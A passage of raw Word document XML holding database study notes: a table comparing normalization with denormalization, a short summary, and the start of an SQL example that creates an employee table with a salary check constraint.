            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Denormalization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="19EBD72C" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="335FAC05" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7856FEE0" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Process of organizing data to reduce redundancy and improve data integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C7CC705" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Process of combining tables to reduce joins and improve read performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="32D22570" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07AA69FC" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FB0A876" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Eliminate data redundancy and ensure data integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="273B8E63" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Improve query performance by reducing joins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="7969BE78" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42F2F960" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E55C0D9" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Uses more tables with relationships (foreign keys)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AD43107" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Uses fewer tables with more redundant data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="45958619" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68BCF522" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3414F6CA" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Slower read operations (due to joins), faster write/update</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234C6A44" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Faster read operations, slower write/update due to redundancy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="3FCF9F72" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14464D4B" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="680FF269" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OLTP systems (e.g., banking, transactions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D3A0E1" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OLAP systems (e.g., reporting, analytics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="61CB3D3A" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B24ABBD" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DD2489" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High (due to reduced duplication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CF826D" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Lower (due to duplication and possible inconsistency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CF8CBA9" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5265B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5265B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9FA51" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5265B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Normalize for write-heavy applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4F328" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E5265B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5265B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Denormalize for read-heavy applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C4457" w14:textId="2214CE3C" w:rsidR="00591CC9" w:rsidRDefault="00E5265B" w:rsidP="00591CC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5265B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Let me know if you want examples for each.</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3E2F1E44">
          <v:rect id="_x0000_i2981" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C492F" w14:textId="4C2E3D2B" w:rsidR="00666CEF" w:rsidRPr="00CE4B95" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Query - Creating table with constraint to check employee salary is greater than 5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758321EB" w14:textId="28D0A0B5" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371BF8CA" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CREATE TABLE employee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724357D" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    emp_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324DE57" w14:textId="77777777" w:rsidR="00666CEF" w:rsidRPr="00666CEF" w:rsidRDefault="00666CEF" w:rsidP="00666CEF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CEF">
        <w:rPr>
